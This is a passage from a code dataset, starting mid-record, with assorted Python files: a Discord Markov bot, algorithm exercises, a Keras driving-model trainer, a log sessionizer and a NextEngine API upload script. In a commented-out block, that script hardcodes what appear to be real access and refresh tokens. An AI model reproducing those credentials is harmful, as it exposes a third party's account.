      ranges.append([bgn, end])\n        bgn += 7\n\n    report = {}\n    index = 1\n    for week_range in ranges:  # renamed from 'range', which shadowed the builtin\n        bgn = week_range[0]\n        end = week_range[1]\n        begin = datetime.datetime(2020, month, bgn, 0, 0)\n        end = datetime.datetime(2020, month, end, 23, 59)\n        print(f'Process the {index}th week...')\n
        lines = parse_by_date(args.repo, begin, end)\n\n        path = os.path.join(args.output, f'{index}th.txt')\n        with open(path, 'w') as hdle:\n            for line in lines:\n                out_line = f'{line}\\n'\n                hdle.write(out_line)\n\n        report[index] = len(lines)\n        index += 1\n\n    path = os.path.join(args.output, 'report.json')\n    with open(path, 'w') as hdle:\n        json.dump(report, hdle)\n\n\nif __name__ == \"__main__\":\n    main()\n\n","sub_path":"rule_analyzer.py","file_name":"rule_analyzer.py","file_ext":"py","file_size_in_byte":1978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"70136592","text":"# -*- coding: utf-8 -*-\n# @Time : 2018/12/8 16:39\n# @Author : YuChou\n# @Site : \n# @File : testone.py\n# @Software: PyCharm\n\nimport multiprocessing\nimport time\nimport threading\n\n\nclass Demo:\n    def __init__(self, thread_num=5):\n        self.thread_num = thread_num\n\n    def productor(self, i):\n        print(\"thread-%d start\" % i)\n\n    def start(self,num):\n        global y\n        y = 100\n        threads = []\n        for x in range(num):\n            t = threading.Thread(target=self.productor, args=(x,))\n            threads.append(t)\n        for t in threads:\n            t.start()\n        for t in threads:\n            t.join()\n        print('all thread end')\n\n\nif __name__ == \"__main__\":\n    demo = Demo()","sub_path":"PishOTA/testone.py","file_name":"testone.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"347447246","text":"# -*- coding: utf-8 -*-\n\nimport socket\n\nif __name__ == '__main__':\n\ts = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\n\twhile True:\n\t\tsbuf = input('send:')\n\t\tif sbuf == 'exit':\n\t\t\tbreak\n\t\ts.sendto(sbuf.encode('utf-8'),('127.0.1.1', 9876))\n\t\tprint(s.recv(1024).decode('utf-8'))\n","sub_path":"udp_client.py","file_name":"udp_client.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"103184316","text":"from datetime import datetime\n\ndef wypisanie_historii():\n    print('Runs so far:')\n    try:\n        plik_do_odczytu = open('uruchomienia.log', mode='r')\n    except FileNotFoundError:\n        print('No run history')\n    else:\n        zawartosc = plik_do_odczytu.read()\n        print(zawartosc)\n\ndef zapisanie_uruchomienia():\n    plik_do_zapisu = open('uruchomienia.log', mode='a')\n    teraz = datetime.now()\n    tekst = f'The script was run at: {teraz}\\n'\n\n    print('Current run:')\n    print(tekst)\n    plik_do_zapisu.write(tekst)\n\nif __name__ == '__main__':\n    wypisanie_historii()\n    zapisanie_uruchomienia()\n","sub_path":"zajecia12/zadanie01b.py","file_name":"zadanie01b.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"126972371","text":"import numpy as np\r\n\r\n\r\nclass ColorFinder:\r\n    def __init__(self, sum_num):\r\n\r\n        # constants\r\n        self.c, self.dielectric_c = 3*1e8, 8.854*1e-12\r\n\r\n        # wave length & rgb_color_matching\r\n        self.length, xyz = [], []\r\n        t = np.array([[0.41847, -0.15866, -0.082835], [-0.091169, 0.25243, 0.015708], [0.0009209, -0.0025498, 0.17860]]) # xyz to rgb\r\n\r\n        with open('lin2012xyz10e_fine_7sf.csv', 'r') as f:\r\n            while True:\r\n                try:\r\n                    l, x, y, z = map(float, f.readline().split(','))\r\n                    self.length.append(l)\r\n                    xyz.append([x,y,z])\r\n                except ValueError:\r\n                    break\r\n\r\n        xyz = xyz[0:4401 - sum_num]\r\n        self.xyz = np.array(xyz)\r\n\r\n        self.color_matching = np.dot(t, self.xyz.T).T # wavelength X rgb (4401 x 3)
\r\n\r\n    def RGB(self, power):\r\n\r\n        return np.dot(power, self.color_matching)\r\n\r\n    def rgb(self, power):\r\n        rgb_info = self.RGB(np.real(power))\r\n\r\n        if rgb_info[0] < 0 or rgb_info[1] < 0 or rgb_info[2] < 0:\r\n            print(\"it can't be shown by the rgb matching function\")\r\n\r\n        r, g, b = np.abs(rgb_info) # if there is a negative value it means it can't be shown by the rgb matching function\r\n        denominator = r + g + b\r\n        tmp1, tmp2, tmp3 = np.dot(np.real(power), self.xyz)\r\n        tmp_sum = tmp1 + tmp2 + tmp3\r\n        print(tmp1/tmp_sum, tmp2/tmp_sum, tmp3/tmp_sum)\r\n\r\n\r\n        return [r/denominator, g/denominator, b/denominator], tmp1/tmp_sum, tmp2/tmp_sum\r\n\r\n\r\nif __name__ == '__main__':\r\n    import matplotlib.pyplot as plt\r\n\r\n    test_wavelength = [i / 10 for i in range(3900, 8301)]\r\n    test_ans = ColorFinder(0).color_matching.T  # sum_num=0 keeps all 4401 samples; the original call omitted the required argument and raised a TypeError\r\n\r\n    plt.title('RGB_converter')\r\n    plt.plot(test_wavelength, test_ans[0], label='r_graph', color='r')\r\n    plt.plot(test_wavelength, test_ans[1], label='g_graph', color='g')\r\n    plt.plot(test_wavelength, test_ans[2], label='b_graph', color='b')\r\n    plt.xlabel('wave_length')\r\n    plt.legend(loc='best')\r\n    plt.show()","sub_path":"graph_to_color.py","file_name":"graph_to_color.py","file_ext":"py","file_size_in_byte":2052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"212983638","text":"import discord\nimport os\nfrom nltk.util import everygrams\nfrom nltk.lm.preprocessing import pad_both_ends\nfrom nltk.tokenize import sent_tokenize, word_tokenize\nfrom nltk.lm.preprocessing import padded_everygram_pipeline\nfrom nltk.tokenize.treebank import TreebankWordDetokenizer\nfrom nltk.lm import MLE\nfrom keep_alive import keep_alive\n\nimport re\nimport random\n\nclient = discord.Client()\n#cleaning\nttalk_fp = os.path.join('ttalk.txt')\nttalk = open(ttalk_fp, encoding='utf-8').read()\nttalk = re.sub(r'\\n', ' ', ttalk)\nttalk = re.sub(r'<[\\#\\@][!0-9]+>', ' ', ttalk)\nttalk = re.sub(r'<\\w*:[A-Za-z0-9\\_]+:\\d+>', ' ', ttalk)\ntokenized = [list(map(str.lower, word_tokenize(word))) for word in sent_tokenize(ttalk)]\n#model training, trigrams\ntrain, padded = padded_everygram_pipeline(3, tokenized)\nmodel = MLE(3)\nmodel.fit(train, padded)\n\n\n#word generation\ndef generate_random_sentence(model, n_words):\n    detokenize = TreebankWordDetokenizer().detokenize\n    sentence = []\n    for word in model.generate(n_words, random_seed = random.randint(-1000000, 1000000)):\n        if word == '<s>':\n            continue\n        if word =='</s>':\n            break\n        sentence.append(word)\n\n    return detokenize(sentence)\n\n#finishing a sentence\ndef finish_sentence(model, n_words, start):\n    detokenize = TreebankWordDetokenizer().detokenize\n    sentence = []\n    sentence.append(start)\n    for word in model.generate(n_words, text_seed = start.split(), random_seed = random.randint(-1000000, 1000000)):\n        if word == '<s>':\n            continue\n        if word =='</s>':\n            break\n        sentence.append(word)\n\n    return detokenize(sentence)\n\n\n@client.event\nasync def on_ready():\n    print(\"I'm in\")\n    print(client.user)\n\n@client.event\nasync def on_message(message):\n    channel_id = '%%' + str(message.channel.id)\n\n    random_length = random.randint(5, 30)\n    if message.content.startswith('ac!generate %%'):\n        if message.author != client.user:\n            generate = generate_random_sentence(model, random_length)\n            combine = re.findall(r'%%[0-9]+', message.content)[0] + ' ' + generate\n            await message.channel.send(combine)\n\n    if message.content.startswith('ac!generate'):\n
        if '%%' not in message.content: \n            if message.author != client.user:\n                generate = generate_random_sentence(model, random_length)\n                combine = generate\n                await message.channel.send(combine)\n\n    #bot talking\n    if message.content.startswith('ac!complete %%'):\n\n        removed_id = re.sub(r'%%[0-9]+', '',message.content)\n\n        to_complete = removed_id[13:]\n        stripped = to_complete.strip('\"')\n\n        sav_id = re.findall(r'%%[0-9]+', message.content)[0]\n        if len(stripped) == 0:\n            if message.author != client.user:\n                error = '!!error give me something to complete .-.'\n                combine = sav_id + ' ' + error\n                await message.channel.send(combine)\n        elif message.author != client.user:\n            generate = finish_sentence(model, random_length, stripped)\n            combine = sav_id + ' ' + generate\n            await message.channel.send(combine)\n\n    if message.content.startswith('ac!complete \"'):\n        to_complete = message.content[13:]\n        stripped = to_complete.strip('\"')\n        if '%%' not in message.content: \n            if message.author != client.user:\n                generate = finish_sentence(model, random_length, stripped)\n                combine = generate\n                await message.channel.send(combine)\n\n    if message.content.startswith('ac!complete'):\n        if '%%' not in message.content: \n            if len(message.content) < 12:\n                if message.author != client.user:\n                    error = '!!error give me something to complete .-.'\n                    combine = error\n                    await message.channel.send(combine)\n            elif message.content[12] != '\"':\n                if message.author != client.user:\n                    error = '!!error add quotation marks around your text silly'\n                    combine = error\n                    await message.channel.send(combine)\n\n\nkeep_alive()  # actually start the keep-alive server; the bare name on the original line was a no-op\ntoken = os.environ.get(\"DISCORD_BOT_SECRET\")\nclient.run(token)","sub_path":"alpha_centuari.py","file_name":"alpha_centuari.py","file_ext":"py","file_size_in_byte":4358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"308198193","text":"'''\nKeep a stack. For each element temp that is read, compare it with the stack top (top): if temp > top, push temp; if temp < top, binary-search the stack for the first number larger than temp and replace that number with temp. The length of the longest increasing subsequence is then the final stack size.\nThis is easy to understand: for x and y with x < y, if Stack[y] < Stack[x], then replacing Stack[x] with Stack[y] leaves the current longest-sequence length unchanged but increases the ''potential'' of the sequence Q.\n\nExample: the original sequence is 1,5,8,3,6,7\nThe stack is 1,5,8; when 3 is read, 5 is replaced by 3, giving 1,3,8; reading 6 replaces 8, giving 1,3,6; reading 7 yields the final stack 1,3,6,7. The longest increasing subsequence has length 4.\n\nWhen a case such as 1,5,8,2 occurs, the stack ends up holding 1,2,8, which is not a valid subsequence - so is the algorithm wrong?\nLooking closer, even though the stack sometimes does not hold an actual subsequence, the final count is still correct. Why?\nThink about it: when temp > top, the total count simply increases by 1, which is clearly correct; and when temp < top? In that case temp merely replaces one element inside the stack, so the size does not change - in other words, adding an element smaller than the stack top never changes the total count. From these two cases we can see that if only the count is needed, this algorithm is quite efficient. But if the actual subsequence has to be printed, DP is the only option.\n'''\n\n
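# Editor's worked trace (added; it only restates the example from the docstring above):\n# read 1 -> [1]; 5 -> [1,5]; 8 -> [1,5,8]; 3 replaces 5 -> [1,3,8]; 6 replaces 8 -> [1,3,6]; 7 -> [1,3,6,7]; answer = 4.\n\n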
class Solution:\n    \"\"\"\n    @param nums: An integer array\n    @return: The length of LIS (longest increasing subsequence)\n    \"\"\"\n    def longestIncreasingSubsequence(self, nums):\n        if nums is None or len(nums) == 0:\n            return 0\n        q = [nums[0]]\n        for i in range(1, len(nums)):\n            if nums[i] > q[-1]:\n                q.append(nums[i])\n            else:\n                l, r = 0, len(q)-1\n                while l <= r:\n                    m = l+(r-l)//2  # integer division; the original '/' made m a float and broke q[m] in Python 3\n                    if nums[i] > q[m]:\n                        l = m + 1\n                    else:\n                        r = m - 1\n                q[l] = nums[i]\n        return len(q)\n\n'''\ndp[i] is the length of the longest increasing subsequence that ends at index i\n'''\n\nclass Solution:\n    \"\"\"\n    @param nums: An integer array\n    @return: The length of LIS (longest increasing subsequence)\n    \"\"\"\n    def longestIncreasingSubsequence(self, nums):\n        if nums is None or len(nums) == 0:\n            return 0\n        dp = [1 for _ in range(len(nums))]\n        for cur, val in enumerate(nums):\n            for prev in range(cur):\n                if nums[prev] < val:\n                    dp[cur] = max(dp[cur], dp[prev] + 1)\n        return max(dp)","sub_path":"dp/76_longest_increasing_subsequence.py","file_name":"76_longest_increasing_subsequence.py","file_ext":"py","file_size_in_byte":2512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"321554305","text":"import pygame.font\n\nclass Button:\n    def __init__(self, ai_game, msg):\n        self.screen = ai_game.screen\n        self.screen_rect = self.screen.get_rect()\n\n        # setting up properties\n        self.width, self.height = 320, 80\n        self.button_color = (243,198,35)\n        self.text_color = (16,55,92)\n        self.font = pygame.font.Font(\"fonts/Gilroy-ExtraBold.otf\", 50)\n\n        # button's rect object and centering\n        self.rect = pygame.Rect(0, 0, self.width, self.height)\n        self.rect.center = self.screen_rect.center\n\n        # the button message\n        self._prep_msg(msg)\n\n    def _prep_msg(self, msg):\n        # turn msg into a rendered image\n        self.msg_image = self.font.render(msg, True, self.text_color, self.button_color)\n        self.msg_image_rect = self.msg_image.get_rect()\n        self.msg_image_rect.center = self.rect.center\n\n    def draw_button(self):\n        self.screen.fill(self.button_color, self.rect)\n        self.screen.blit(self.msg_image, self.msg_image_rect)\n\n","sub_path":"button.py","file_name":"button.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"188279832","text":"def quick_sort(arr):\n\tif len(arr) <= 1:\n\t\treturn arr\n\tpivot = arr[len(arr)//2]\n\tdel arr[len(arr)//2]\n\tarr1, arr2 = [], []\n\tfor i in range(len(arr)):\n\t\tif arr[i] <= pivot:\n\t\t\tarr1.append(arr[i])\n\t\telse:\n\t\t\tarr2.append(arr[i])\n\treturn quick_sort(arr1) + [pivot] + quick_sort(arr2)\n\ndef main(input):\n\tarr = input.split(',')\n\tarr = [int(x) for x in arr]\n\tprint(quick_sort(arr))\n\nif __name__ == \"__main__\":\n\tmain(input())","sub_path":"quick_sort.py","file_name":"quick_sort.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"210454844","text":"import requests\nimport pandas\nimport json\nimport codecs\n\ntoken = pandas.read_csv('token.csv')\naccess_token = token['access_token'][0]\nrefresh_token = token['refresh_token'][0]\nendPoint = \"https://api.next-engine.org/api_v1_master_goods/upload\"\norderEndPorint = 'https://api.next-engine.org/api_v1_receiveorder_base/upload'\nNE_Result = 'https://api.next-engine.org/api_v1_system_que/search'\n\n\n#ProductUpload \n'''\ndata = 
open('stockUpdateCSV.csv')\n\nparamsJSON = {\n \"access_token\":\"90ed23ea1794c42a3ee2ff7e951d06d14a225f3ce4abc23f1690d9fdb665233e1fe1fdbbbab26add55bb2eb72eb502b6695f88ecd81a8acd2ac10f4a27e6fe52\",\n \"refresh_token\":\"d6c6a81f277aa7bfb97e145ca5dd5a4375bbc2691e2f19e3d09f1e2d3b8e851eaa88282a24f184d804e14b7707da492bc1ef66d9fb6a845ee96bd4e02b191d10\",\n \"wait_flag\":\"1\",\n \"data_type\":\"csv\",\n \"data\":data.read()\n }\n\nrequest = requests.post(endPoint, data=paramsJSON)\nresult = request.content\nresult_json = json.loads(result)\nprint(result_json)\n\n'''\n'''\n### OrderUpdate\n\ndata = codecs.open('sample.csv', 'r', 'shift_jis', 'ignore')\n\nparamsJSON = {\n \"access_token\":access_token,\n \"refresh_token\":refresh_token,\n \"wait_flag\":\"1\",\n \"receive_order_upload_pattern_id\":\"2\",\n \"data_type_1\":\"csv\",\n \"data_1\":data.read()\n }\n\nrequest = requests.post(orderEndPorint, data=paramsJSON)\nresult = request.content\nresult_json = json.loads(result)\nprint(result_json)\n\n'''\n\n## Query NE Job Result\nparamsJSON = {\n \"access_token\":access_token,\n \"refresh_token\":refresh_token,\n \"wait_flag\":\"1\",\n \"fields\":\"que_id,que_method_name,que_upload_name,que_status_id,que_message\",\n \"que_creation_date-gte\":\"2018-09-03\",\n \"limit\":\"3\"\n }\n\nrequest = requests.post(NE_Result, data=paramsJSON)\nresult = request.content\nresult_json = json.loads(result)\nprint(result_json)\n","sub_path":"FNS-NE/upTest.py","file_name":"upTest.py","file_ext":"py","file_size_in_byte":1961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"192407400","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('roster', '0004_auto_20150901_1218'),\n ]\n\n operations = [\n migrations.RenameField(\n model_name='shiftslot',\n old_name='time_slot',\n new_name='shift_times',\n ),\n ]\n","sub_path":"roster/migrations/0005_auto_20150901_1220.py","file_name":"0005_auto_20150901_1220.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"164653495","text":"import csv\r\nimport cv2\r\nimport numpy as np\r\nimport random\r\nfrom preprocess import preprocess\r\nfrom pathlib import Path\r\nfrom sklearn.utils import shuffle\r\nimport sys\r\n\r\n_training_data_root = 'training_data'\r\n\r\n_cameras = { 0: 'center', 1: 'left', 2: 'right'}\r\n\r\n\r\ndef print_progress_bar (iteration, total, prefix = 'progress:', suffix = ' ', decimals = 1, length = 30, fill = '='):\r\n percent = (\"{0:.\" + str(decimals) + \"f}\").format(100 * (iteration / float(total)))\r\n filledLength = int(length * iteration // total)\r\n bar = fill * filledLength + '.' 
* (length - filledLength)\r\n print('\\r%s [%s] %s%% %s' % (prefix, bar, percent, suffix), end = '\\r')\r\n if iteration == total:\r\n print()\r\n\r\nclass TrainData:\r\n def __init__(self):\r\n self.images = [[],[],[]]\r\n self.camera = []\r\n self.steer = []\r\n self.throttle = []\r\n self.brake = []\r\n self.speed = []\r\n\r\n def append(self, images, steer, throttle, brake, speed):\r\n for i in range(len(self.images)):\r\n self.images[i].append(images[i])\r\n self.steer.append(steer)\r\n self.throttle.append(throttle)\r\n self.brake.append(brake)\r\n self.speed.append(speed)\r\n\r\n def print(self, i):\r\n print('----------------------')\r\n print('train data :', i)\r\n print(' steer :', self.steer[i])\r\n print(' throttle :', self.throttle[i])\r\n print(' brake :', self.brake[i])\r\n print(' speed :', self.speed[i])\r\n\r\n def get_train_data(self, camera):\r\n return (np.array(self.images[camera]),np.array(self.steer))\r\n\r\n def preprocess(self):\r\n num_images=sum(len(x) for x in self.images)\r\n print('preprocess images:',num_images)\r\n i=0\r\n print_progress_bar(i, num_images, prefix = 'preprocess:')\r\n for image_set_index in range(len(self.images)):\r\n for img_index in range(len(self.images[image_set_index])):\r\n self.images[image_set_index][img_index] = preprocess(self.images[image_set_index][img_index])\r\n i+=1\r\n if i%100==0:\r\n print_progress_bar(i, num_images, prefix = 'preprocess:')\r\n print_progress_bar(num_images, num_images, prefix = 'preprocess:')\r\n\r\n def get_all_train_data(self, side_steer=0.15):\r\n images = np.array(self.images[0]+self.images[1]+self.images[2]);\r\n steer = np.append(np.append(np.array(self.steer),\r\n np.zeros(len(self.steer))+side_steer),\r\n np.zeros(len(self.steer))-side_steer)\r\n print(images.shape)\r\n print(steer.shape)\r\n return (images, steer)\r\n\r\n def get_train_data_straight_augmented(self, correction=0.6, correction_range=0.01, side_correction=0.2):\r\n images = []\r\n steer = []\r\n center_steer_correction = correction\r\n print('.get train data steer augmented')\r\n print(' raw steer samples :',len(self.steer))\r\n n_zero_steer=0\r\n n_with_steer=0\r\n for i in range(len(self.steer)):\r\n if abs(self.steer[i])<0.001:\r\n n_zero_steer+=1\r\n c = correction\r\n if correction_range>0:\r\n c=random.uniform(correction-correction_range, correction+correction_range)\r\n images.append(self.images[1][i])\r\n steer.append(c)\r\n images.append(self.images[2][i])\r\n steer.append(-c)\r\n else:\r\n n_with_steer+=1\r\n images.append(self.images[0][i])\r\n steer.append(self.steer[i])\r\n images.append(np.fliplr(self.images[0][i]))\r\n steer.append(-self.steer[i])\r\n\r\n images.append(self.images[1][i])\r\n steer.append(min(1,self.steer[i]+side_correction))\r\n images.append(self.images[2][i])\r\n steer.append(max(-1,self.steer[i]-side_correction))\r\n images.append(np.fliplr(self.images[1][i]))\r\n steer.append(-(min(1,self.steer[i]+side_correction)))\r\n images.append(np.fliplr(self.images[2][i]))\r\n steer.append(-(max(-1,self.steer[i]-side_correction)))\r\n\r\n print(' no steer samples :',n_zero_steer)\r\n print(' with steer samples :',n_with_steer)\r\n print(' augmented samples :',len(steer))\r\n return(np.array(images), np.array(steer))\r\n\r\n def pickle(self):\r\n import pickle\r\n pickle.dump(self.images, open('images.p', 'wb'))\r\n pickle.dump(self.steer, open('steer.p', 'wb'))\r\n\r\n def unpickle(self):\r\n import pickle\r\n self.images = pickle.load(open('images.p', 'rb'))\r\n self.steer = pickle.load(open('steer.p', 
'rb'))\r\n\r\ndef get_csv_len(csv_filename):\r\n with open(csv_filename, 'r') as f:\r\n reader = csv.reader(f)\r\n data = list(reader)\r\n row_count = len(data)\r\n return(row_count)\r\n\r\ndef get_csv_filename(folder, force_marked=False):\r\n marked_file = Path('{}/{}/driving_log_marked.csv'.format(_training_data_root, folder))\r\n if force_marked or marked_file.is_file():\r\n return(str(marked_file))\r\n return '{}/{}/driving_log.csv'.format(_training_data_root, folder)\r\n\r\ndef read_train_data_folder(train_data, folder, min_speed=1):\r\n print('.read train data folder:',folder)\r\n csv_filename = get_csv_filename(folder)\r\n print('.drive log:',csv_filename)\r\n csv_len = get_csv_len(csv_filename)\r\n print('.csv length:', csv_len)\r\n i=0\r\n print_progress_bar(i, csv_len, prefix = 'read {}:'.format(folder))\r\n with open(csv_filename, 'r') as csvfile:\r\n reader = csv.reader(csvfile)\r\n for line in reader:\r\n try:\r\n speed = float(line[3])\r\n except:\r\n continue\r\n if float(line[6])<min_speed:\r\n continue\r\n marked = True\r\n if (len(line)>7):\r\n marked = not line[7]=='False'\r\n if not marked:\r\n continue\r\n images = []\r\n for image_name in line[:3]:\r\n image_name = image_name.split('\\\\')[-1]\r\n image_file = '{}/{}/IMG/{}'.format(_training_data_root, folder, image_name)\r\n image = cv2.imread(image_file)\r\n images.append(image)\r\n train_data.append(images, float(line[3]), float(line[4]), float(line[5]), float(line[6]))\r\n i += 1\r\n if i%100==0:\r\n print_progress_bar(i, csv_len, prefix = 'read {}:'.format(folder))\r\n print_progress_bar(csv_len, csv_len, prefix = 'read {}:'.format(folder))\r\n\r\ndef read_train_data(train_data, folders):\r\n for folder in folders:\r\n read_train_data_folder(train_data, folder)\r\n\r\ntrain_data = TrainData()\r\n\r\n_reload_data = True\r\n\r\nif _reload_data:\r\n read_train_data(train_data,['j1','j2','j3','j5','j6','j8','j9'])\r\n read_train_data(train_data,['k1','k2','k3'])\r\n read_train_data(train_data,['k4','k5','j4','j7']) # shade turn\r\n read_train_data(train_data,['k6','k7','k8','k9']) # downhill right\r\n read_train_data(train_data,['l1','l2', 'l3']) # downhill right\r\n\r\n train_data.preprocess()\r\n train_data.pickle()\r\nelse:\r\n train_data.unpickle()\r\n\r\n\r\nX_train, y_train = train_data.get_train_data_straight_augmented(correction=0.065, correction_range=0.005)\r\n\r\n\r\nprint('X_train shape:',X_train.shape)\r\nprint('y_train shape:',y_train.shape)\r\nprint('X_train image shape:',X_train[0].shape)\r\n\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Flatten, Dense, Lambda, Cropping2D, Convolution2D, Dropout, MaxPooling2D\r\nfrom keras import regularizers\r\n\r\n_dropout=0.2\r\n\r\nmodel = Sequential()\r\nmodel.add(Convolution2D(8, (5, 5), activation='elu', padding='same', input_shape=X_train.shape[1:]))\r\nmodel.add(MaxPooling2D())\r\nmodel.add(Dropout(_dropout))\r\nmodel.add(Convolution2D(16, (3, 3), activation='elu', padding='same'))\r\nmodel.add(MaxPooling2D())\r\nmodel.add(Dropout(_dropout))\r\nmodel.add(Convolution2D(32, (3, 3), activation='elu', padding='same'))\r\nmodel.add(MaxPooling2D())\r\nmodel.add(Dropout(_dropout))\r\nmodel.add(Convolution2D(64, (3, 3), activation='elu', padding='same'))\r\nmodel.add(MaxPooling2D())\r\nmodel.add(Dropout(_dropout))\r\n\r\nmodel.add(Flatten())\r\nmodel.add(Dense(1000))\r\nmodel.add(Dense(100))\r\nmodel.add(Dense(50))\r\nmodel.add(Dense(10))\r\nmodel.add(Dense(1))\r\n\r\nmodel.compile(loss='mse', 
optimizer='adam')\r\n\r\nprint(model.summary())\r\n\r\nfor i in range(48):\r\n print('.epoch:',i+1)\r\n X_train, y_train = shuffle(X_train, y_train)\r\n model.fit(X_train, y_train, validation_split=0.2, shuffle=False, epochs=1)\r\n if i>25:\r\n model.save('model.{:02d}.h5'.format(i))\r\n\r\nmodel.save('model.h5')\r\n\r\n\r\n","sub_path":"CarND-Behavioral-Cloning-P3-Submission/track2/clone.py","file_name":"clone.py","file_ext":"py","file_size_in_byte":8763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"287231393","text":"## Sessionization.py for Edgar-Analytics-Master challenge\r\nimport os\r\nimport csv\r\nfrom datetime import datetime, timedelta\r\ndatetime_format = \"%Y-%m-%d %H:%M:%S\"\r\n\r\n## data formate initialization\r\ndata =[] #a list to store info from each row in log.csv file\r\ndict = {} #dicionary to use IP as key, and other info as its values.\r\nresult = [] #list to store final results\r\nnew_list = [] #list to store the processed log record.\r\n\r\n\r\n## path setting for data reading and result output\r\ncur_path = os.getcwd() #get current working directionary path\r\nfile_path1 = os.path.join(cur_path, \"input\", \"inactivity_period.txt\")\r\nfile_path2 = os.path.join(cur_path, \"input\", \"log.csv\")\r\nfile_path3 = os.path.join(cur_path, \"output\", \"sessionization.txt\")\r\n\r\n## read in inactive period value from inactivity_period.txt file\r\nf1 = open(file_path1,'r')\r\ninactivity_period = int(f1.readline())\r\n\r\n## read in raw data from log.csv file\r\nf2 = open(file_path2,'r')\r\nrawdata = csv.reader(f2)\r\n\r\n## Remove the empty line in log.csv\r\nfor row in rawdata:\r\n if row != []:\r\n data.append(row) #data is a list data structure\r\n\r\n## read log entry from line2 (index 1), and scan through each line of log\r\nfor i in range(1,len(data)):\r\n row = data[i]\r\n key = row[0] #key = IP address\r\n timestamp = datetime.strptime(row[1] + ' ' + row[2], datetime_format)\r\n\r\n ## check if the IP is a new record or has already exit in dict key\r\n if key not in dict.keys():\r\n ## key values in order: 0:st-time,1:ed-time, 2:filename, 3:file type, 4:access time,\r\n ## 5:number of file accessed, 6:time diff= save as zero for now\r\n dict[key] = [timestamp,timestamp,row[5],row[6],1,1,0]\r\n\r\n else:\r\n ## if the IP already exists in curr_dict key\r\n ## chech if it passes the inactivity_period since last visit\r\n diff = timestamp - dict[key][1] #### diff = current timestamp - last time visited\r\n access_time = diff.seconds\r\n\r\n ## if this acess is within the inactivity_period, then update the existing record in dict\r\n if access_time <= inactivity_period:\r\n dict[key][0] = dict[key][0] #first request time #####\r\n dict[key][1] = timestamp #last request time\r\n\r\n # update time elapsed : diff = last request time - first request time\r\n dict[key][4] += access_time\r\n\r\n # Update the file accessed and the number of file accessed\r\n dict[key][2] = row[5]\r\n dict[key][3] = row[6]\r\n # update the number of file accessed\r\n dict[key][5] += 1\r\n # time diff, save as zero for now\r\n dict[key][6] = 0\r\n\r\n ## if this visit has pasted the inactivity peropd, then append the exisiting record to new_list,\r\n ## then create a new IP entry in dict\r\n else:\r\n new_list.append([key,dict[key]])\r\n dict[key] = [timestamp,timestamp,row[5],row[6],1,1,0]\r\n\r\n# scan thru all key-value pair from dict to new_list\r\nfor key in dict.keys():\r\n new_list.append([key,dict[key]])\r\n\r\n## create two 
list to store records passed inactivity_period\r\n## and record have not passed the inactivity_period.\r\nres_list1 = [] # for records passed inactivity_period\r\nres_list2 = [] # for records have not passed inactivity_period\r\n\r\n## scan thru the new_list, to calculate the delta time = current_timestamp - first access time\r\n## then ass this delta to the end of new_list\r\nfor item in new_list:\r\n delta = (timestamp-item[1][1]).seconds\r\n item[1][6] = delta\r\n\r\n ## determine if the record passed the inactivity_period or not\r\n ## if passed, store in res_list1, if not passed, store in res_list2\r\n if delta > inactivity_period:\r\n res_list1.append([item[0],item[1][0],item[1][1],item[1][4],item[1][5],item[1][6]])\r\n else: #delta <= inactivity_period\r\n res_list2.append([item[0],item[1][0],item[1][1],item[1][4],item[1][5],item[1][6]])\r\n\r\nfrom operator import itemgetter\r\n## order res_list1 by descending of delta time\r\nres_list1 = sorted(res_list1,key=itemgetter(5),reverse=True)\r\n## order res_list2 by st_time and ed_time\r\nres_list2 = sorted(res_list2,key=itemgetter(1,2))\r\n\r\n## combine the two soreted list as final result list\r\nfor item in (res_list1 + res_list2):\r\n result.append(item[:5])\r\n\r\n## write result to sessionization.txt\r\nimport datetime\r\nformat11 = '%Y-%m-%d %H:%M:%S'\r\n\r\nf3 = open(file_path3,'w')\r\nwith f3 as f:\r\n for item in result:\r\n item[1] = item[1].strftime(format11)\r\n item[2] = item[2].strftime(format11)\r\n wr = csv.writer(f,lineterminator='\\n')\r\n wr.writerows(result)\r\nf3.close()\r\n","sub_path":"src/sessionization.py","file_name":"sessionization.py","file_ext":"py","file_size_in_byte":4617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"83645280","text":"class Solution(object):\n\n def maxSubArray(self, nums):\n \"\"\"\n Given an integer array nums, find the contiguous subarray (containing at least one number) which has the largest\n sum and return its sum.\n\n Runtime: 72 ms, faster than 92.49% of Python3 online submissions for Maximum Subarray.\n Memory Usage: 14.7 MB, less than 5.69% of Python3 online submissions for Maximum Subarray.\n\n\n Parameters\n ----------\n nums : list\n\n\n Returns\n -------\n ret : int\n\n\n Examples\n --------\n >>> Solution().maxSubArray([-2, 1, -3, 4, -1, 2, 1, -5, 4])\n 6\n\n \"\"\"\n\n mem = [0] * len(nums)\n for idx, val in enumerate(nums):\n try:\n mem[idx] = max(val, val + mem[idx - 1])\n except IndexError:\n mem[idx] = val\n # 